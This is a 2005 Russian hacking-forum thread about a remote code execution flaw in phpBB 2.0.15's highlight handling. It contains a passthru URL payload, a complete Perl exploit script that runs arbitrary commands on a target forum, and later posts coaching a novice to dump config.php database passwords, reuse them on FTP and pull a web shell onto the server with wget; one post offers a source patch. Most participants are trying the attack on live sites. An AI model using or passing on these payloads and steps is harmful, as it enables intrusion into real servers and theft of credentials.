Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимости форумов phpbb 2.0.15 (https://forum.antichat.xyz/showthread.php?t=7527)

exbbxak 30.06.2005 17:10

Уязвимости форумов phpbb 2.0.15
 
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Программа: phpBB 2.0.15

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его.

KLez 30.06.2005 17:28

Учись
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

bul666 30.06.2005 17:30

ни че не происходит!

exbbxak 30.06.2005 17:51

спасиб посмотрим

bul666 30.06.2005 17:54

Если че найдешь то соообщи!

bul666 30.06.2005 18:10

Незнаю, почем, но когда я выполняю его, то у меня страница грузиться намного дольше... Но на странице ничего нет, если команда "ls" выполняется невидимо, то можно было вместо "ls" поставить "rm viewtopic.php" и страница бы уже не грузилась... Но ничего не происходит!

coyl 30.06.2005 18:34

ох уж мне этот пхпББ... =)

GreenBear 30.06.2005 18:43

защита:
открыть viewtopic.php

найти:
Цитата:

$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', $highlight_match) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
заменить на:
Цитата:

$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', addslashes($highlight_match)) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));

exbbxak 30.06.2005 18:48

Green_Bear
спасибо

coyl 30.06.2005 20:38

а еще лучшая защита - перейти на ипб или воблу. я уже. =)

vorishka 30.06.2005 20:46

Ребята, жизнь прекрасна или я мазахист. Но ничего не получается... Помогите...

Rebz 30.06.2005 20:52

хрень какая-то..
прошёлся по сайтам, и нихрена уязвимость не сработала..

coyl 30.06.2005 21:02

такая же тема, но мне на данный момент это не надо.

GreenBear 30.06.2005 21:19

ХЗ, мож она и не работае :d.
я тож на се проверял - ноль. или ошибка где.

Rebz 30.06.2005 21:39

ошибка в том, видимо, кто осмелилися уязвимость на гл.странице выложить..
хотя это уже брали.. но блин.. это наверно с перепою запостил Кондор..))) шучу..)

GreenBear 30.06.2005 21:47

ну тогда это уже не первая ошибка.... с версией 12 или 13, не помню уже, когда выложили видео как за 5 секнуд стать админом было намного.... *цензура*

m0nzt3r 30.06.2005 23:46

чето не работает!

WeKSTiK 01.07.2005 00:09

вот рабочий sploit по крайней мере он работал днём!!!

bul666 01.07.2005 00:20

Цитата:

Сообщение от WeKSTiK
по крайней мере он работал днём!!!

А че вечером он может не работать? )))

bul666 01.07.2005 00:21

Цитата:

Сообщение от WeKSTiK
вот рабочий sploit по крайней мере он работал днём!!!

Вы лажи сюда... А то региться не охота

m0nzt3r 01.07.2005 00:21

а как файл взять то там зарегистроваться надо! дай другой линк и что за сплойт?

Xalegi 01.07.2005 09:17

этот баг работает =)) зер гуд...

как я понял, методом тыка, кол-во повторений вызываемой команды равно кол-ву постов на странице =))) так чтоб было удобней выбирайте топик, где только одно сообщение =))

vorishka 01.07.2005 09:57

Блин понатуре выложите сюда, там нада регаться... =))) Пожалуйста!!!

GreenBear 01.07.2005 10:04

по многочислеым просьбам трудящихся:

Код:

#!/usr/bin/perl

use IO::Socket;

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
    phpBB <=2.0.15 remote command execution exploit
        by RusH security team // www.rst.void.ru
        Littttttttttle modificated by nori!
                r57 respect!
############################################################
 usage:
 
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la"
############################################################
 ); 
 exit;
 }

$serv  = $ARGV[0];
$dir  = $ARGV[1];
$topic = $ARGV[2];
$cmd  = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%27';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

все спасибо ввиде повышения репутации :D

m0nzt3r 01.07.2005 23:45

это сплойт Раш Тимы на 2.0.10 в переделанном виде ))
щас попробоую...))

bul666 01.07.2005 23:55

Как им пользоваться?

SK | Heaton 02.07.2005 10:18

Цитата:

r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
надо компилировать код пот названием r57phpbb2010.pl ?!

S1on 02.07.2005 13:01

Здарова народ. Я тут новинький :)
Чёта я куда небюсь этим сплойтом, мне все выдает "Exploit failed" У ковонить он нормально работает?

GreenBear 02.07.2005 13:12

да, у меня.

WeKSTiK 02.07.2005 13:16

И у меня, всё работает на ура!!!

S1on 02.07.2005 17:04

я ввожу "phpbb.pl 192.168.140.14 / 459 "ls -la"
форум пропачен до 2.0.15 причем криво, с хакера сплоит пробивает но он какой то странный. Это тоже канает (http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
кстати, как спомощью этого /\/\/\ грузануть файл на сервак?

m0nzt3r 02.07.2005 23:28

у меня тоже это сплойт работал только тогда когда он вышел в свет))) а щас все время файлед...
>>надо компилировать код пот названием r57phpbb2010.pl ?!
вы что не понимаете что ПЕРЛ СКРИПТЫ не компилят??

GreenBear 02.07.2005 23:54

дык я думаю против такой баги даже самые ленивые админы обновляют форумы.

Dragunov 03.07.2005 13:24

&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Воспользовался вот этой темой...
admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php
Получил данное сообщение.
Обясните ламеру что делать дальше? Как получить пароли от форума и.т.п.?

Dragunov 03.07.2005 13:39

Пожалуйста помогите)) Введите в курс дела...объясните че за сплойт)) ПОжалуйста!

Rebz 03.07.2005 14:24

Dragunov, максимум что ты получишь - пароли от БД. =))

их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'

Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);
?>

Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.

для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.

Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.

зы: можно писать несколько команд через точку с запятой.

Dragunov 03.07.2005 14:36

Я грю)) Я конкретный ламер) ЧТо такое шелл?

Rebz 03.07.2005 14:54

нда...
шелл - оболочка для удалённых команд, грубо говоря..)
иди на php.spb.ru/remview/
и качай remview.php . Это и есть шелл.
его и будешь заливать, только сначала зарегь сайт на народе и туда залей шелл. потом будешь к нему обращаться... С тебя 5 баксов =)).

Dragunov 03.07.2005 15:16

Не качает...пишет архив битый...

Rebz 03.07.2005 15:23

не может быть такого...
http://php.spb.ru/remview/remview_2003_10_23.zip

всё нормал качает


Время: 12:14